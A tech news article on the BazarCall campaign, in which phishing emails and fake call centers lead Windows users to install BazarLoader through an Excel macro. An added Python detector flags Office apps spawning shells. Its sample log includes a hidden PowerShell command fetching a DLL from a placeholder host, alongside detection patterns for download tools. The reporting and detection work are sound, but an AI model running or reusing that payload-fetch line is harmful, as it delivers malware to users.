This is something we say repeatedly here on Make Tech Easier as we report the news: every time scammers and bad actors develop a new attack, the tech industry finds a way to fight back and close that vulnerability. That sends the attackers back to the drawing board to create a new attack, and the cycle goes on and on. The newest attack vector for ransomware is call centers. Will this force Microsoft to amp up its game to fight back?
Call Centers Ransomware Attack
Now that the battle has escalated to attackers emboldened enough to set up fake call centers, the ball is in Microsoft’s court to stop them. Microsoft has a team of cybersecurity researchers on the case, going after the BazarCall group behind the call center ransomware attack.
Users who call these call centers wind up with their PCs infected with BazarLoader, a malware loader that delivers further malware.
The BazarCall (aka Bazacall) group has been at this since the beginning of the year, using call center operators to convince callers to install BazarLoader on their PCs.
Brad Duncan of Palo Alto Networks described the attack this way: “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment, and exploit other vulnerable hosts on the network.”
The attack starts with a Windows user receiving a phishing email informing them that a subscription trial has expired and that they will be charged a fee. To avoid the charge, they need to call and cancel.
The Microsoft Security Intelligence team is focusing on the emails that target Office 365 users. In one sample email, the attackers claim to be from a tech company and say the user will be charged when a demo expires in 24 hours.
“When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” the security team explained.
Microsoft’s team also said that Cobalt Strike, a penetration testing kit often used once a system has been initially compromised, is used to obtain credentials. Among the information stolen is the Active Directory database, which holds identity and credential data, gathered via Cobalt Strike.
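The macro stage of this chain, an Excel file whose macro downloads the payload, is commonly hunted by flagging an Office process that spawns a shell or download-capable utility. The detector below is an added example, not code from the article or from Microsoft’s report; the process names, download markers, log format and sample events are assumptions constructed for this illustration.

```python
import re

# Heuristic for the macro stage: an Office app spawning a shell or download tool.
# These process names and markers are this example's assumptions, not from the article.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|urlcache|https?://", re.I)

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> dict:
    """Parse one constructed, tab-separated 'Key=Value' process-creation record."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("\t"))

def classify(event: dict):
    """Return an alert for an Office parent launching a script child, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    cmd = event.get("CommandLine", "")
    # A download marker in the command line raises severity: payload fetch in progress.
    severity = "high" if DOWNLOAD_MARKERS.search(cmd) else "medium"
    return {"host": event.get("Computer", "?"), "parent": parent,
            "child": child, "severity": severity, "cmd": cmd}

def detect(lines):
    """Run classify over raw log lines and keep only the alerts."""
    return [a for a in (classify(parse_event(l)) for l in lines if l.strip()) if a]

# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_LOG = "\n".join([
    "Computer=WS01\tParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tImage=C:\\Windows\\System32\\cmd.exe"
    "\tCommandLine=cmd.exe /c powershell -w hidden (New-Object Net.WebClient)"
    ".DownloadFile('http://example.invalid/x.dll','%TEMP%\\x.dll')",
    "Computer=WS01\tParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /c dir",
    "Computer=WS02\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /c dir",
    "Computer=WS02\tParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tImage=C:\\Windows\\splwow64.exe\tCommandLine=splwow64.exe 12288",
])

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert["severity"], alert["host"], alert["parent"], "->", alert["child"])
```

The last two sample events show why the parent/child pairing matters: a shell under Explorer and a print helper under Excel are both normal and produce no alert.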
After the Attack
Again, this is just one round in an ongoing cycle, and it is a bit alarming to consider where it will lead next. BazarCall used a familiar attack but carried it out in a way that kept users from suspecting anything. Not all users would expect that the call center they are directed to would kick off a ransomware attack.
But now that the Microsoft security team is onto BazarCall and has figured out the attack, the cybercriminals will be forced to move on to a new destructive plan. And that’s where the alarm comes in: what will the attackers do next? How will they up their game this time?